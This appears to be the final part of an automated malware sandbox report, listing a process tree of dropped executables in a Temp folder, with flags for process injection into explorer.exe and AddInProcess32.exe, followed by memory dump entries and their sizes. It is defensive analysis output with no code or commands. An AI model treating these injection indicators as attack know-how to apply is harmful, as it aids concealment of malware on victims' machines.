                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:5932
                                                                            • C:\Users\Admin\AppData\Local\Temp\8697.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\8697.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:5528
                                                                            • C:\Users\Admin\AppData\Local\Temp\8F91.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\8F91.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:5616
                                                                            • C:\Users\Admin\AppData\Local\Temp\94F1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\94F1.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4148
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                2⤵
                                                                                  PID:4484
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                1⤵
                                                                                  PID:5720
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe
                                                                                  1⤵
                                                                                    PID:4812
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:2340
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:4140
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:1468
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:5300
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:4996
                                                                                        • C:\Windows\explorer.exe
                                                                                          C:\Windows\explorer.exe
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5172
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:5204
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                            1⤵
                                                                                              PID:2760
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                              1⤵
                                                                                                PID:4340
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                • Modifies registry class
                                                                                                PID:5216
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                  PID:5544
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                  1⤵
                                                                                                    PID:3972
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                    1⤵
                                                                                                      PID:5384

                                                                                                    Network

                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                    Replay Monitor

                                                                                                    Loading Replay Monitor...

                                                                                                    Downloads

                                                                                                    • memory/8-230-0x0000019B32B00000-0x0000019B32B4B000-memory.dmp

                                                                                                      Filesize

                                                                                                      300KB

                                                                                                    • memory/8-231-0x0000019B32BC0000-0x0000019B32C30000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/948-245-0x000001AB52320000-0x000001AB52390000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1000-236-0x00000173E0C60000-0x00000173E0CD0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1068-243-0x0000024ECFD70000-0x0000024ECFDE0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1264-254-0x0000016E182C0000-0x0000016E18330000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1272-251-0x000001F4E1270000-0x000001F4E12E0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1456-247-0x000002F2DDC80000-0x000002F2DDCF0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/1800-141-0x0000000002FD0000-0x0000000002FD2000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/1896-249-0x000001B9A2080000-0x000001B9A20F0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2108-126-0x0000000000400000-0x0000000000416000-memory.dmp

                                                                                                      Filesize

                                                                                                      88KB

                                                                                                    • memory/2364-239-0x000001453EC90000-0x000001453ED00000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2404-241-0x00000159FAF10000-0x00000159FAF80000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2672-233-0x000001C08D3A0000-0x000001C08D410000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2688-256-0x000001E560940000-0x000001E5609B0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2712-258-0x000001FF69A60000-0x000001FF69AD0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/2732-123-0x00000000016B0000-0x00000000016B2000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/3052-316-0x0000000002CE0000-0x0000000002CF5000-memory.dmp

                                                                                                      Filesize

                                                                                                      84KB

                                                                                                    • memory/3052-314-0x0000000000B30000-0x0000000000B47000-memory.dmp

                                                                                                      Filesize

                                                                                                      92KB

                                                                                                    • memory/3744-114-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                      Filesize

                                                                                                      172KB

                                                                                                    • memory/4024-119-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4032-140-0x0000000002180000-0x0000000002182000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/4032-147-0x0000000002182000-0x0000000002184000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/4032-148-0x0000000002184000-0x0000000002185000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4032-149-0x0000000002185000-0x0000000002187000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/4080-146-0x0000000002EB0000-0x0000000002EB2000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/4080-150-0x0000000002EB2000-0x0000000002EB4000-memory.dmp

                                                                                                      Filesize

                                                                                                      8KB

                                                                                                    • memory/4080-152-0x0000000002EB5000-0x0000000002EB6000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4724-158-0x00000000006F0000-0x0000000000702000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/4724-157-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/4744-337-0x0000000006983000-0x0000000006984000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4744-332-0x0000000006980000-0x0000000006981000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/4744-333-0x0000000006982000-0x0000000006983000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5148-266-0x00000000001F0000-0x0000000000200000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/5148-267-0x0000000000570000-0x00000000006BA000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.3MB

                                                                                                    • memory/5152-300-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                      Filesize

                                                                                                      48KB

                                                                                                    • memory/5180-317-0x0000000000400000-0x0000000002FD0000-memory.dmp

                                                                                                      Filesize

                                                                                                      43.8MB

                                                                                                    • memory/5180-315-0x00000000050D0000-0x00000000059DB000-memory.dmp

                                                                                                      Filesize

                                                                                                      9.0MB

                                                                                                    • memory/5536-304-0x0000000004680000-0x000000000468C000-memory.dmp

                                                                                                      Filesize

                                                                                                      48KB

                                                                                                    • memory/5604-309-0x00000000081D0000-0x00000000081D1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-307-0x0000000007980000-0x0000000007981000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-296-0x0000000005110000-0x0000000005111000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-329-0x0000000005253000-0x0000000005254000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-297-0x0000000007AA0000-0x0000000007AA1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-308-0x00000000079F0000-0x00000000079F1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-298-0x0000000005250000-0x0000000005251000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-299-0x0000000005252000-0x0000000005253000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5604-306-0x0000000007880000-0x0000000007881000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/5628-285-0x000001A0ED700000-0x000001A0ED7FF000-memory.dmp

                                                                                                      Filesize

                                                                                                      1020KB

                                                                                                    • memory/5628-237-0x000001A0EB070000-0x000001A0EB0E0000-memory.dmp

                                                                                                      Filesize

                                                                                                      448KB

                                                                                                    • memory/5668-229-0x0000000004380000-0x00000000043DC000-memory.dmp

                                                                                                      Filesize

                                                                                                      368KB

                                                                                                    • memory/5668-228-0x000000000411D000-0x000000000421E000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.0MB

                                                                                                    • memory/5888-312-0x0000000000400000-0x0000000002BA8000-memory.dmp

                                                                                                      Filesize

                                                                                                      39.7MB

                                                                                                    • memory/5888-311-0x00000000001D0000-0x00000000001D9000-memory.dmp

                                                                                                      Filesize

                                                                                                      36KB

                                                                                                    • memory/5964-169-0x0000000003580000-0x0000000003590000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/5964-175-0x0000000003720000-0x0000000003730000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/5992-275-0x0000000000400000-0x0000000002BF4000-memory.dmp

                                                                                                      Filesize

                                                                                                      40.0MB

                                                                                                    • memory/5992-274-0x0000000004890000-0x0000000004921000-memory.dmp

                                                                                                      Filesize

                                                                                                      580KB